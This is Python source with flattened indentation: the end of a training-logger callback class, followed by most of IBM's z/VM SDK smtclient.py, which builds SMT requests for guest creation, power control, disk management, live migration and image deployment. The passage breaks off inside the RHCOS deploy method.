# Callback runs on val image end
if self.wandb:
self.wandb.val_one_image(pred, predn, path, names, im)
def on_val_end(self):
# Callback runs on val end
if self.wandb:
files = sorted(self.save_dir.glob('val*.jpg'))
self.wandb.log({"Validation": [wandb.Image(str(f), caption=f.name) for f in files]})
def on_fit_epoch_end(self, vals, epoch, best_fitness, fi):
# Callback runs at the end of each fit (train+val) epoch
x = {k: v for k, v in zip(self.keys, vals)} # dict
if self.csv:
file = self.save_dir / 'results.csv'
n = len(x) + 1 # number of cols
s = '' if file.exists() else (('%20s,' * n % tuple(['epoch'] + self.keys)).rstrip(',') + '\n') # add header
with open(file, 'a') as f:
f.write(s + ('%20.5g,' * n % tuple([epoch] + vals)).rstrip(',') + '\n')
if self.tb:
for k, v in x.items():
self.tb.add_scalar(k, v, epoch)
if self.wandb:
self.wandb.log(x)
self.wandb.end_epoch(best_result=best_fitness == fi)
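    # For reference, the CSV block above writes one header row followed by one row per
    # epoch; each value is right-aligned in a 20-character field, e.g. (values illustrative):
    #                epoch,      train/box_loss,      train/obj_loss, ...
    #                    0,             0.04321,             0.06543, ...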
def on_model_save(self, last, epoch, final_epoch, best_fitness, fi):
# Callback runs on model save event
if self.wandb:
if ((epoch + 1) % self.opt.save_period == 0 and not final_epoch) and self.opt.save_period != -1:
self.wandb.log_model(last.parent, self.opt, epoch, fi, best_model=best_fitness == fi)
def on_train_end(self, last, best, plots, epoch):
# Callback runs on training end
if plots:
plot_results(file=self.save_dir / 'results.csv') # save results.png
files = ['results.png', 'confusion_matrix.png', *[f'{x}_curve.png' for x in ('F1', 'PR', 'P', 'R')]]
files = [(self.save_dir / f) for f in files if (self.save_dir / f).exists()] # filter
if self.tb:
import cv2
for f in files:
self.tb.add_image(f.stem, cv2.imread(str(f))[..., ::-1], epoch, dataformats='HWC')
if self.wandb:
self.wandb.log({"Results": [wandb.Image(str(f), caption=f.name) for f in files]})
# Calling wandb.log. TODO: Refactor this into WandbLogger.log_model
if not self.opt.evolve:
wandb.log_artifact(str(best if best.exists() else last), type='model',
name='run_' + self.wandb.wandb_run.id + '_model',
aliases=['latest', 'best', 'stripped'])
self.wandb.finish_run()
else:
self.wandb.finish_run()
self.wandb = WandbLogger(self.opt)
|
smtclient.py
|
# Copyright 2017,2020 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import functools
import hashlib
import math
# On SLES12, we found that if you import urllib.parse later than
# requests, you will see an error like 'not able to load
# urllib.parse'; this is because urllib will already be in sys.modules
# when requests is first imported.
# As a workaround, we first import urllib and then import requests.
# Later, we should consider using urllib.request to replace requests,
# if possible, to avoid this kind of issue.
from io import IOBase
import shutil
import six.moves.urllib.parse as urlparse
import requests
import threading
import os
import re
import six
import string
import subprocess
import tempfile
import time
from smtLayer import smt
from zvmsdk import config
from zvmsdk import constants as const
from zvmsdk import database
from zvmsdk import exception
from zvmsdk import log
from zvmsdk import returncode
from zvmsdk import utils as zvmutils
CONF = config.CONF
LOG = log.LOG
_LOCK = threading.Lock()
CHUNKSIZE = 4096
_SMT_CLIENT = None
def get_smtclient():
global _SMT_CLIENT
if _SMT_CLIENT is None:
try:
_SMT_CLIENT = zvmutils.import_object(
'zvmsdk.smtclient.SMTClient')
except ImportError:
LOG.error("Unable to get smtclient")
raise ImportError
return _SMT_CLIENT
class SMTClient(object):
def __init__(self):
self._smt = smt.SMT()
self._pathutils = zvmutils.PathUtils()
self._NetDbOperator = database.NetworkDbOperator()
self._GuestDbOperator = database.GuestDbOperator()
self._ImageDbOperator = database.ImageDbOperator()
def _request(self, requestData):
try:
results = self._smt.request(requestData)
except Exception as err:
LOG.error('SMT internal parse encounter error')
raise exception.SDKInternalError(msg=err, modID='smt')
def _is_smt_internal_error(results):
internal_error_list = returncode.SMT_INTERNAL_ERROR
for error in internal_error_list:
if results['overallRC'] != error[0]:
# overallRC does not match, continue next
continue
if error[1] is not None and results['rc'] != error[1]:
# rc match failed
continue
if error[2] is not None and results['rs'] not in error[2]:
# rs match failed
continue
# All match finish successfully, return true
return True
return False
if results['overallRC'] != 0:
results.pop('logEntries')
            # Check whether this SMT error is an internal error; if so, raise an
            # internal error, otherwise raise a client-request-failed error.
if _is_smt_internal_error(results):
msg = "SMT internal error. Results: %s" % str(results)
LOG.error(msg)
raise exception.SDKInternalError(msg=msg,
modID='smt',
results=results)
else:
msg = ("SMT request failed. RequestData: '%s', Results: '%s'"
% (requestData, str(results)))
raise exception.SDKSMTRequestFailed(results, msg)
return results
def get_guest_temp_path(self, userid):
return self._pathutils.get_guest_temp_path(userid)
def get_guest_path(self, userid):
return self._pathutils.get_guest_path(userid)
def clean_temp_folder(self, tmp_folder):
return self._pathutils.clean_temp_folder(tmp_folder)
def _generate_vdev(self, base, offset):
"""Generate virtual device number based on base vdev
        :param base: base virtual device number, a 4-digit hex string.
:param offset: offset to base, integer.
"""
vdev = hex(int(base, 16) + offset)[2:]
return vdev.rjust(4, '0')
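    # Example of the vdev arithmetic above (illustrative): base '0100' with offset 2
    # gives hex(0x100 + 2)[2:] == '102', which is right-justified to '0102'.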
def _generate_increasing_nic_id(self, nic_id):
"""Generate increasing nic id string
:param nic_id: hexadecimal nic id like '1000'
:return: increasing nic id, string like '0.0.1000,0.0.1001,0.0.1002'
"""
nic_id = str(hex(int(nic_id, 16)))[2:]
nic_id_1 = str(hex(int(nic_id, 16) + 1))[2:]
nic_id_2 = str(hex(int(nic_id, 16) + 2))[2:]
if len(nic_id_2) > 4:
errmsg = ("Virtual device number %s is not valid" % nic_id_2)
raise exception.SDKInvalidInputFormat(msg=errmsg)
return "0.0.%s,0.0.%s,0.0.%s" % (nic_id, nic_id_1, nic_id_2)
def generate_disk_vdev(self, start_vdev=None, offset=0):
"""Generate virtual device number for disks
:param offset: offset of user_root_vdev.
        :return: virtual device number, a 4-digit hex string.
"""
if not start_vdev:
start_vdev = CONF.zvm.user_root_vdev
vdev = self._generate_vdev(start_vdev, offset)
if offset >= 0 and offset < 254:
return vdev
else:
            msg = ("Failed to generate disk vdev, invalid virtual device "
                   "number for disk:%s" % vdev)
LOG.error(msg)
raise exception.SDKGuestOperationError(rs=2, msg=msg)
def add_mdisks(self, userid, disk_list, start_vdev=None):
"""Add disks for the userid
:disks: A list dictionary to describe disk info, for example:
disk: [{'size': '1g',
'format': 'ext3',
'disk_pool': 'ECKD:eckdpool1'},
{'size': '1g',
'format': 'ext3'}]
"""
        # First, check disk_pool for each disk in disk_list; if disk_pool is not
        # specified and not configured (the default value is None), report an error.
for idx, disk in enumerate(disk_list):
disk_pool = disk.get('disk_pool') or CONF.zvm.disk_pool
disk['disk_pool'] = disk_pool
if disk_pool is None:
msg = ('disk_pool not configured for sdkserver.')
LOG.error(msg)
raise exception.SDKGuestOperationError(rs=2, msg=msg)
for idx, disk in enumerate(disk_list):
if 'vdev' in disk:
                # this means the user wants to specify their own device number
vdev = disk['vdev']
else:
vdev = self.generate_disk_vdev(start_vdev=start_vdev,
offset=idx)
self._add_mdisk(userid, disk, vdev)
disk['vdev'] = vdev
sizeUpper = disk.get('size').strip().upper()
sizeUnit = sizeUpper[-1]
if sizeUnit != 'G' and sizeUnit != 'M':
sizeValue = sizeUpper
disk_pool = disk.get('disk_pool')
[diskpool_type, diskpool_name] = disk_pool.split(':')
if (diskpool_type.upper() == 'ECKD'):
# Convert the cylinders to bytes
convert = 737280
else:
# Convert the blocks to bytes
convert = 512
byteSize = float(float(int(sizeValue) * convert / 1024) / 1024)
unit = "M"
if (byteSize > 1024):
byteSize = float(byteSize / 1024)
unit = "G"
byteSize = "%.1f" % byteSize
disk['size'] = byteSize + unit
return disk_list
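    # Worked example of the size normalization above (illustrative): an ECKD size of
    # '1100' (cylinders, no unit suffix) converts as 1100 * 737280 / 1024 / 1024
    # ~= 773.4, which is below 1024 and is therefore stored back as '773.4M'.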
def remove_mdisks(self, userid, vdev_list):
for vdev in vdev_list:
self._remove_mdisk(userid, vdev)
def dedicate_device(self, userid, vaddr, raddr, mode):
"""dedicate device
:userid: The name of the image obtaining a dedicated device
:vaddr: The virtual device number of the device
:raddr: A real device number to be dedicated or attached
to the specified image
:mode: Specify a 1 if the virtual device is to be in read-only mode.
Otherwise, specify a 0.
"""
# dedicate device to directory entry
self._dedicate_device(userid, vaddr, raddr, mode)
def _dedicate_device(self, userid, vaddr, raddr, mode):
"""dedicate device."""
action = 'dedicate'
rd = ('changevm %(uid)s %(act)s %(va)s %(ra)s %(mod)i' %
{'uid': userid, 'act': action,
'va': vaddr, 'ra': raddr, 'mod': mode})
action = "dedicate device to userid '%s'" % userid
with zvmutils.log_and_reraise_smt_request_failed(action):
self._request(rd)
def get_fcp_info_by_status(self, userid, status):
"""get fcp information by the status.
:userid: The name of the image to query fcp info
:status: The status of target fcps. eg:'active', 'free' or 'offline'.
"""
results = self._get_fcp_info_by_status(userid, status)
return results
def _get_fcp_info_by_status(self, userid, status):
action = 'fcpinfo'
rd = ' '.join(['getvm', userid, action, status])
action = "query fcp info of '%s'" % userid
with zvmutils.log_and_reraise_smt_request_failed(action):
results = self._request(rd)
return results['response']
def undedicate_device(self, userid, vaddr):
"""undedicate device
:userid: The name of the image obtaining a dedicated device
:vaddr: The virtual device number of the device
"""
# undedicate device to directory entry
self._undedicate_device(userid, vaddr)
def _undedicate_device(self, userid, vaddr):
"""undedicate device."""
action = 'undedicate'
rd = ('changevm %(uid)s %(act)s %(va)s' %
{'uid': userid, 'act': action,
'va': vaddr})
action = "undedicate device from userid '%s'" % userid
with zvmutils.log_and_reraise_smt_request_failed(action):
self._request(rd)
def get_image_performance_info(self, userid):
"""Get CPU and memory usage information.
:userid: the zvm userid to be queried
"""
pi_dict = self.image_performance_query([userid])
return pi_dict.get(userid, None)
def get_adapters_info(self, userid):
rd = ' '.join((
"SMAPI %s API Virtual_Network_Adapter_Query_Extended" % userid,
"--operands",
"-k 'image_device_number=*'"))
results = None
action = "get network info of userid '%s'" % str(userid)
with zvmutils.log_and_reraise_smt_request_failed(action):
results = self._request(rd)
ret = results['response']
        # TODO: multi NIC support?
nic_count = 0
for line in ret:
if 'adapter_count=' in line:
nic_count = int(line.strip().split('=')[-1])
break
if nic_count < 1:
msg = 'get_network_info:No NIC found on userid %s' % userid
LOG.error(msg)
raise exception.SDKGuestOperationError(rs=5, userid=userid,
msg=msg)
# save network info into dict by index from 1 to nic_count
# Firstly, get adapter information
adapters_info = []
adapter = dict()
        # once an IP is found for an adapter, stop updating its MAC address
found_mac = False
for line in ret:
if 'adapter_address=' in line:
adapter_addr = line.strip().split('=')[-1]
adapter['adapter_address'] = adapter_addr
if 'adapter_status=' in line:
adapter_type = line.strip().split('=')[-1]
adapter['adapter_status'] = adapter_type
if 'lan_owner=' in line:
lan_owner = line.strip().split('=')[-1]
adapter['lan_owner'] = lan_owner
if 'lan_name=' in line:
lan_name = line.strip().split('=')[-1]
adapter['lan_name'] = lan_name
if 'mac_address=' in line and not found_mac:
mac_addr = line.strip().split('=')[-1]
pattern = re.compile('.{2}')
mac_address = ':'.join(pattern.findall(mac_addr))
adapter['mac_address'] = mac_address
if 'mac_ip_version=' in line:
ip_version = line.strip().split('=')[-1]
adapter['mac_ip_version'] = ip_version
if 'mac_ip_address=' in line:
# once we found mac_ip_address, assume this is the MAC
# we are using, then jump to next adapter
mac_ip = line.strip().split('=')[-1]
adapter['mac_ip_address'] = mac_ip
found_mac = True
if 'adapter_info_end' in line:
adapters_info.append(adapter)
# clear adapter and process next
adapter = dict()
found_mac = False
return adapters_info
def _parse_vswitch_inspect_data(self, rd_list):
""" Parse the Virtual_Network_Vswitch_Query_Byte_Stats data to get
inspect data.
"""
def _parse_value(data_list, idx, keyword, offset):
return idx + offset, data_list[idx].rpartition(keyword)[2].strip()
vsw_dict = {}
with zvmutils.expect_invalid_resp_data():
# vswitch count
idx = 0
idx, vsw_count = _parse_value(rd_list, idx, 'vswitch count:', 2)
vsw_dict['vswitch_count'] = int(vsw_count)
# deal with each vswitch data
vsw_dict['vswitches'] = []
for i in range(vsw_dict['vswitch_count']):
vsw_data = {}
# skip vswitch number
idx += 1
# vswitch name
idx, vsw_name = _parse_value(rd_list, idx, 'vswitch name:', 1)
vsw_data['vswitch_name'] = vsw_name
# uplink count
idx, up_count = _parse_value(rd_list, idx, 'uplink count:', 1)
# skip uplink data
idx += int(up_count) * 9
# skip bridge data
idx += 8
# nic count
vsw_data['nics'] = []
idx, nic_count = _parse_value(rd_list, idx, 'nic count:', 1)
nic_count = int(nic_count)
for j in range(nic_count):
nic_data = {}
idx, nic_id = _parse_value(rd_list, idx, 'nic_id:', 1)
userid, toss, vdev = nic_id.partition(' ')
nic_data['userid'] = userid
nic_data['vdev'] = vdev
idx, nic_data['nic_fr_rx'] = _parse_value(rd_list, idx,
'nic_fr_rx:', 1
)
idx, nic_data['nic_fr_rx_dsc'] = _parse_value(rd_list, idx,
'nic_fr_rx_dsc:', 1
)
idx, nic_data['nic_fr_rx_err'] = _parse_value(rd_list, idx,
'nic_fr_rx_err:', 1
)
idx, nic_data['nic_fr_tx'] = _parse_value(rd_list, idx,
'nic_fr_tx:', 1
)
idx, nic_data['nic_fr_tx_dsc'] = _parse_value(rd_list, idx,
'nic_fr_tx_dsc:', 1
)
idx, nic_data['nic_fr_tx_err'] = _parse_value(rd_list, idx,
'nic_fr_tx_err:', 1
)
idx, nic_data['nic_rx'] = _parse_value(rd_list, idx,
'nic_rx:', 1
)
idx, nic_data['nic_tx'] = _parse_value(rd_list, idx,
'nic_tx:', 1
)
vsw_data['nics'].append(nic_data)
# vlan count
idx, vlan_count = _parse_value(rd_list, idx, 'vlan count:', 1)
# skip vlan data
idx += int(vlan_count) * 3
# skip the blank line
idx += 1
vsw_dict['vswitches'].append(vsw_data)
return vsw_dict
def _is_vdev_valid(self, vdev, vdev_info):
for used_vdev in vdev_info:
if (((int(vdev, 16) >= int(used_vdev, 16)) and
(int(vdev, 16) <= int(used_vdev, 16) + 2)) or
((int(vdev, 16) < int(used_vdev, 16)) and
(int(vdev, 16) >= int(used_vdev, 16) - 2))):
return False
return True
def get_power_state(self, userid):
"""Get power status of a z/VM instance."""
LOG.debug('Querying power stat of %s' % userid)
requestData = "PowerVM " + userid + " status"
action = "query power state of '%s'" % userid
with zvmutils.log_and_reraise_smt_request_failed(action):
results = self._request(requestData)
with zvmutils.expect_invalid_resp_data(results):
status = results['response'][0].partition(': ')[2]
return status
def _check_power_state(self, userid, action):
# Get the vm status
power_state = self.get_power_state(userid)
# Power on the vm if it is inactive
if power_state == 'off':
msg = ('The vm %s is powered off, please start up it '
'before %s' % (userid, action))
raise exception.SDKGuestOperationError(rs=5, userid=userid,
msg=msg)
def guest_start(self, userid):
"""Power on VM."""
requestData = "PowerVM " + userid + " on"
with zvmutils.log_and_reraise_smt_request_failed():
self._request(requestData)
def guest_stop(self, userid, **kwargs):
"""Power off VM."""
requestData = "PowerVM " + userid + " off"
if 'timeout' in kwargs.keys() and kwargs['timeout']:
requestData += ' --maxwait ' + str(kwargs['timeout'])
if 'poll_interval' in kwargs.keys() and kwargs['poll_interval']:
requestData += ' --poll ' + str(kwargs['poll_interval'])
with zvmutils.log_and_reraise_smt_request_failed():
self._request(requestData)
def guest_softstop(self, userid, **kwargs):
"""Power off VM gracefully, it will call shutdown os then
deactivate vm"""
requestData = "PowerVM " + userid + " softoff --wait"
if 'timeout' in kwargs.keys() and kwargs['timeout']:
requestData += ' --maxwait ' + str(kwargs['timeout'])
else:
requestData += ' --maxwait ' + str(CONF.guest.softstop_timeout)
if 'poll_interval' in kwargs.keys() and kwargs['poll_interval']:
requestData += ' --poll ' + str(kwargs['poll_interval'])
else:
requestData += ' --poll ' + str(CONF.guest.softstop_interval)
with zvmutils.log_and_reraise_smt_request_failed():
self._request(requestData)
def guest_pause(self, userid):
self._check_power_state(userid, 'pause')
requestData = "PowerVM " + userid + " pause"
with zvmutils.log_and_reraise_smt_request_failed():
self._request(requestData)
def guest_unpause(self, userid):
self._check_power_state(userid, 'unpause')
requestData = "PowerVM " + userid + " unpause"
with zvmutils.log_and_reraise_smt_request_failed():
self._request(requestData)
def guest_reboot(self, userid):
requestData = ' '.join(("PowerVM", userid, "reboot"))
with zvmutils.log_and_reraise_smt_request_failed():
self._request(requestData)
def guest_reset(self, userid):
requestData = ' '.join(("PowerVM", userid, "reset"))
with zvmutils.log_and_reraise_smt_request_failed():
self._request(requestData)
def live_migrate_move(self, userid, destination, parms):
""" moves the specified virtual machine, while it continues to run,
to the specified system within the SSI cluster. """
rd = ('migratevm %(uid)s move --destination %(dest)s ' %
{'uid': userid, 'dest': destination})
if 'maxtotal' in parms:
rd += ('--maxtotal ' + str(parms['maxTotal']))
if 'maxquiesce' in parms:
rd += ('--maxquiesce ' + str(parms['maxquiesce']))
if 'immediate' in parms:
rd += " --immediate"
if 'forcearch' in parms:
rd += " --forcearch"
if 'forcedomain' in parms:
rd += " --forcedomain"
if 'forcestorage' in parms:
rd += " --forcestorage"
action = "move userid '%s' to SSI '%s'" % (userid, destination)
try:
self._request(rd)
except exception.SDKSMTRequestFailed as err:
msg = ''
if action is not None:
msg = "Failed to %s. " % action
msg += "SMT error: %s" % err.format_message()
LOG.error(msg)
raise exception.SDKSMTRequestFailed(err.results, msg)
def live_migrate_test(self, userid, destination):
""" tests the specified virtual machine and reports whether or not
it is eligible to be relocated to the specified system. """
rd = ('migratevm %(uid)s test --destination %(dest)s ' %
{'uid': userid, 'dest': destination})
action = "test to move userid '%s' to SSI '%s'" % (userid, destination)
try:
self._request(rd)
except exception.SDKSMTRequestFailed as err:
msg = ''
if action is not None:
msg = "Failed to %s. " % action
msg += "SMT error: %s" % err.format_message()
LOG.error(msg)
raise exception.SDKSMTRequestFailed(err.results, msg)
def _get_ipl_param(self, ipl_from):
if len(ipl_from) > 0:
ipl_param = ipl_from
else:
ipl_param = CONF.zvm.user_root_vdev
return ipl_param
def create_vm(self, userid, cpu, memory, disk_list, profile,
max_cpu, max_mem, ipl_from, ipl_param, ipl_loadparam,
dedicate_vdevs, loaddev):
""" Create VM and add disks if specified. """
rd = ('makevm %(uid)s directory LBYONLY %(mem)im %(pri)s '
'--cpus %(cpu)i --profile %(prof)s --maxCPU %(max_cpu)i '
'--maxMemSize %(max_mem)s --setReservedMem' %
{'uid': userid, 'mem': memory,
'pri': const.ZVM_USER_DEFAULT_PRIVILEGE,
'cpu': cpu, 'prof': profile,
'max_cpu': max_cpu, 'max_mem': max_mem})
if CONF.zvm.default_admin_userid:
rd += (' --logonby "%s"' % CONF.zvm.default_admin_userid)
        # when using dasd as the root disk, disk_list[0] would be the boot
        # disk.
        # when booting from a volume, ipl_from should be specified explicitly.
if (disk_list and 'is_boot_disk' in disk_list[0] and
disk_list[0]['is_boot_disk']) or ipl_from:
            # we assume at least one disk exists, which means is_boot_disk
            # is true for exactly one disk.
rd += (' --ipl %s' % self._get_ipl_param(ipl_from))
# load param for ipl
if ipl_param:
rd += ' --iplParam %s' % ipl_param
if ipl_loadparam:
rd += ' --iplLoadparam %s' % ipl_loadparam
if dedicate_vdevs:
rd += ' --dedicate "%s"' % " ".join(dedicate_vdevs)
if loaddev:
if 'portname' in loaddev:
rd += ' --loadportname %s' % loaddev['portname']
if 'lun' in loaddev:
rd += ' --loadlun %s' % loaddev['lun']
        # Now consider the swap-only case: the customer boots from a volume but no
        # disk pool is provided. In that case we allow creating the swap disk from a
        # vdisk by default; when we reach this logic we can be sure that if there is
        # no disk pool, there is only one disk in disk_list and it is the swap disk.
vdisk = None
        # This is the swap-only case: only a swap disk is created
        # (len(disk_list) is 1) and there are no other disks.
if len(disk_list) == 1:
disk = disk_list[0]
if 'format' in disk and disk['format'].lower() == 'swap':
disk_pool = disk.get('disk_pool') or CONF.zvm.disk_pool
if disk_pool is None:
# If it is a vdisk, create the user direct entry directly
vd = disk.get('vdev') or self.generate_disk_vdev(offset=0)
disk['vdev'] = vd
sizeUpper = disk['size'].strip().upper()
sizeUnit = sizeUpper[-1]
if sizeUnit != 'M' and sizeUnit != 'G':
errmsg = ("%s must has 'M' or 'G' suffix" % sizeUpper)
raise exception.SDKInvalidInputFormat(msg=errmsg)
rd += ' --vdisk %s:%s' % (vd, sizeUpper)
vdisk = disk
action = "create userid '%s'" % userid
try:
self._request(rd)
except exception.SDKSMTRequestFailed as err:
if ((err.results['rc'] == 436) and (err.results['rs'] == 4)):
result = "Profile '%s'" % profile
raise exception.SDKObjectNotExistError(obj_desc=result,
modID='guest')
else:
msg = ''
if action is not None:
msg = "Failed to %s. " % action
msg += "SMT error: %s" % err.format_message()
LOG.error(msg)
raise exception.SDKSMTRequestFailed(err.results, msg)
# Add the guest to the database immediately after the userid is created
action = "add guest '%s' to database" % userid
with zvmutils.log_and_reraise_sdkbase_error(action):
self._GuestDbOperator.add_guest(userid)
# Continue to add disks: if vdisk is None, this is not the
# vdisk-only routine and we need to add the disks.
if vdisk is None and disk_list:
# Do not perform mkfs against the root disk
if disk_list[0].get('is_boot_disk'):
disk_list[0].update({'format': 'none'})
return self.add_mdisks(userid, disk_list)
# Return the swap disk so that guest config can handle the
# remaining jobs.
return disk_list
def _add_mdisk(self, userid, disk, vdev):
"""Create one disk for userid
NOTE: No read, write and multi password specified, and
access mode default as 'MR'.
"""
size = disk['size']
fmt = disk.get('format', 'ext4')
disk_pool = disk.get('disk_pool') or CONF.zvm.disk_pool
# Check disk_pool, if it's None, report error
if disk_pool is None:
msg = ('disk_pool not configured for sdkserver.')
LOG.error(msg)
raise exception.SDKGuestOperationError(rs=2, msg=msg)
[diskpool_type, diskpool_name] = disk_pool.split(':')
if (diskpool_type.upper() == 'ECKD'):
action = 'add3390'
else:
action = 'add9336'
rd = ' '.join(['changevm', userid, action, diskpool_name,
vdev, size, '--mode MR'])
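# Illustrative example (assumed values): for a 2g ECKD disk from pool
# 'POOL1' at vdev '0101', rd is 'changevm LINUX01 add3390 POOL1 0101 2g
# --mode MR', plus ' --filesystem ext4' when a filesystem format is given.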
if fmt and fmt != 'none':
rd += (' --filesystem %s' % fmt.lower())
action = "add mdisk to userid '%s'" % userid
with zvmutils.log_and_reraise_smt_request_failed(action):
self._request(rd)
def get_vm_list(self):
"""Get the list of guests that are created by SDK
return userid list"""
action = "list all guests in database"
with zvmutils.log_and_reraise_sdkbase_error(action):
guests_in_db = self._GuestDbOperator.get_guest_list()
guests_migrated = \
self._GuestDbOperator.get_migrated_guest_info_list()
# The db query returns tuples of (uuid, userid, metadata, comments)
userids_in_db = [g[1].upper() for g in guests_in_db]
userids_migrated = [g[1].upper() for g in guests_migrated]
userid_list = list(set(userids_in_db) - set(userids_migrated))
return userid_list
def _remove_mdisk(self, userid, vdev):
rd = ' '.join(('changevm', userid, 'removedisk', vdev))
action = "remove disk with vdev '%s' from userid '%s'" % (vdev, userid)
with zvmutils.log_and_reraise_smt_request_failed(action):
self._request(rd)
def guest_authorize_iucv_client(self, userid, client=None):
"""Punch a script that used to set the authorized client userid in vm
If the guest is in log off status, the change will take effect when
the guest start up at first time.
If the guest is in active status, power off and power on are needed
for the change to take effect.
:param str guest: the user id of the vm
:param str client: the user id of the client that can communicate to
guest using IUCV"""
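# The generated script is punched to the guest reader with spool class
# 'x'; it is processed when the guest IPLs to authorize the client
# userid for IUCV communication.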
client = client or zvmutils.get_smt_userid()
iucv_path = "/tmp/" + userid
if not os.path.exists(iucv_path):
os.makedirs(iucv_path)
iucv_auth_file = iucv_path + "/iucvauth.sh"
zvmutils.generate_iucv_authfile(iucv_auth_file, client)
try:
requestData = "ChangeVM " + userid + " punchfile " + \
iucv_auth_file + " --class x"
self._request(requestData)
except exception.SDKSMTRequestFailed as err:
msg = ("Failed to punch IUCV auth file to userid '%s'. SMT error:"
" %s" % (userid, err.format_message()))
LOG.error(msg)
raise exception.SDKSMTRequestFailed(err.results, msg)
finally:
self._pathutils.clean_temp_folder(iucv_path)
def volume_refresh_bootmap(self, fcpchannels, wwpns, lun, skipzipl=False):
""" Refresh bootmap info of specific volume.
: param fcpchannels: list of fcpchannels.
: param wwpns: list of wwpns.
: param lun: string of lun.
: return value: list of FCP devices and physical wwpns.
"""
fcps = ','.join(fcpchannels)
ws = ','.join(wwpns)
fcs = "--fcpchannel=%s" % fcps
wwpns = "--wwpn=%s" % ws
lun = "--lun=%s" % lun
if skipzipl:
skipzipl = "--skipzipl=YES"
cmd = ['sudo', '/opt/zthin/bin/refresh_bootmap', fcs, wwpns, lun,
skipzipl]
else:
cmd = ['sudo', '/opt/zthin/bin/refresh_bootmap', fcs, wwpns, lun]
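# Illustrative example (assumed values): with fcpchannels ['1a00', '1b00'],
# one wwpn, one lun and skipzipl=True, cmd becomes roughly
# ['sudo', '/opt/zthin/bin/refresh_bootmap', '--fcpchannel=1a00,1b00',
# '--wwpn=5005076802100c1b', '--lun=0000000000000000', '--skipzipl=YES']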
LOG.info("Running command: %s", cmd)
with zvmutils.expect_and_reraise_internal_error(
modID='refresh_bootmap'):
(rc, output) = zvmutils.execute(cmd)
if rc != 0:
err_msg = ("refresh_bootmap failed with return code: %d." % rc)
err_output = ""
output_lines = output.split('\n')
for line in output_lines:
if line.__contains__("ERROR:"):
err_output += ("\\n" + line.strip())
LOG.error(err_msg + err_output)
raise exception.SDKVolumeOperationError(rs=5,
errcode=rc,
errmsg=err_output)
output_lines = output.split('\n')
res_wwpns = []
res_fcps = []
for line in output_lines:
if line.__contains__("WWPNs: "):
wwpns = line[7:]
# Convert string to list by space
res_wwpns = wwpns.split()
if line.__contains__("FCPs: "):
fcps = line[6:]
# Convert string to list by space
res_fcps = fcps.split()
return res_wwpns, res_fcps
def guest_deploy(self, userid, image_name, transportfiles=None,
remotehost=None, vdev=None, skipdiskcopy=False):
""" Deploy image and punch config driver to target """
# (TODO: add the support of multiple disks deploy)
if skipdiskcopy:
msg = ('Start guest_deploy without unpackdiskimage, guest: %(vm)s, '
'os_version: %(img)s' % {'img': image_name, 'vm': userid})
LOG.info(msg)
else:
msg = ('Start to deploy image %(img)s to guest %(vm)s'
% {'img': image_name, 'vm': userid})
LOG.info(msg)
image_file = '/'.join([self._get_image_path_by_name(image_name),
CONF.zvm.user_root_vdev])
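# The deployable image file is stored under the deploy repository as
# <repo>/netboot/<os_version>/<image_name>/<root_vdev>, e.g. .../0100
# (see the image_import docstring below), so image_file points at the
# root disk image.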
# Unpack image file to root disk
vdev = vdev or CONF.zvm.user_root_vdev
cmd = ['sudo', '/opt/zthin/bin/unpackdiskimage', userid, vdev,
image_file]
with zvmutils.expect_and_reraise_internal_error(modID='guest'):
(rc, output) = zvmutils.execute(cmd)
if rc != 0:
err_msg = ("unpackdiskimage failed with return code: %d." % rc)
err_output = ""
output_lines = output.split('\n')
for line in output_lines:
if line.__contains__("ERROR:"):
err_output += ("\\n" + line.strip())
LOG.error(err_msg + err_output)
raise exception.SDKGuestOperationError(rs=3, userid=userid,
unpack_rc=rc,
err=err_output)
# Purge guest reader to clean dirty data
rd = ("changevm %s purgerdr" % userid)
action = "purge reader of '%s'" % userid
with zvmutils.log_and_reraise_smt_request_failed(action):
self._request(rd)
# Punch transport files if specified
if transportfiles:
# Copy transport file to local
msg = ('Start to send customized file to vm %s' % userid)
LOG.info(msg)
try:
tmp_trans_dir = tempfile.mkdtemp()
local_trans = '/'.join([tmp_trans_dir,
os.path.basename(transportfiles)])
if remotehost:
cmd = ["/usr/bin/scp", "-B",
"-P", CONF.zvm.remotehost_sshd_port,
"-o StrictHostKeyChecking=no",
("%s:%s" % (remotehost, transportfiles)),
local_trans]
else:
cmd = ["/usr/bin/cp", transportfiles, local_trans]
with zvmutils.expect_and_reraise_internal_error(modID='guest'):
(rc, output) = zvmutils.execute(cmd)
if rc != 0:
err_msg = ('copy config drive with command %(cmd)s '
'failed with output: %(res)s' %
{'cmd': str(cmd), 'res': output})
LOG.error(err_msg)
raise exception.SDKGuestOperationError(rs=4, userid=userid,
err_info=err_msg)
# Punch config drive to guest userid
rd = ("changevm %(uid)s punchfile %(file)s --class X" %
{'uid': userid, 'file': local_trans})
action = "punch config drive to userid '%s'" % userid
with zvmutils.log_and_reraise_smt_request_failed(action):
self._request(rd)
finally:
# remove the local temp config drive folder
self._pathutils.clean_temp_folder(tmp_trans_dir)
# Authorize iucv client
client_id = None
# Try to re-use the previously authorized iucv userid first
if os.path.exists(const.IUCV_AUTH_USERID_PATH):
LOG.debug("Re-use previous iucv authorized userid")
with open(const.IUCV_AUTH_USERID_PATH) as f:
client_id = f.read().strip()
self.guest_authorize_iucv_client(userid, client_id)
# Update os version in guest metadata
# TODO: may need to append to old metadata, not replace
if skipdiskcopy:
os_version = image_name
else:
image_info = self._ImageDbOperator.image_query_record(image_name)
os_version = image_info[0]['imageosdistro']
metadata = 'os_version=%s' % os_version
self._GuestDbOperator.update_guest_by_userid(userid, meta=metadata)
if skipdiskcopy:
msg = ('guest_deploy without unpackdiskimage finished successfully, '
'guest: %(vm)s, os_version: %(img)s'
% {'img': image_name, 'vm': userid})
else:
msg = ('Deploy image %(img)s to guest %(vm)s disk %(vdev)s'
' successfully' % {'img': image_name, 'vm': userid,
'vdev': vdev})
LOG.info(msg)
def guest_deploy_rhcos(self, userid, image_name, transportfiles,
remotehost=None, vdev=None, hostname=None,
skipdiskcopy=False):
""" Deploy image"""
# (TODO: add the support of multiple disks deploy)
if transportfiles is None:
err_msg = 'Ignition file is required when deploying RHCOS image'
LOG.error(err_msg)
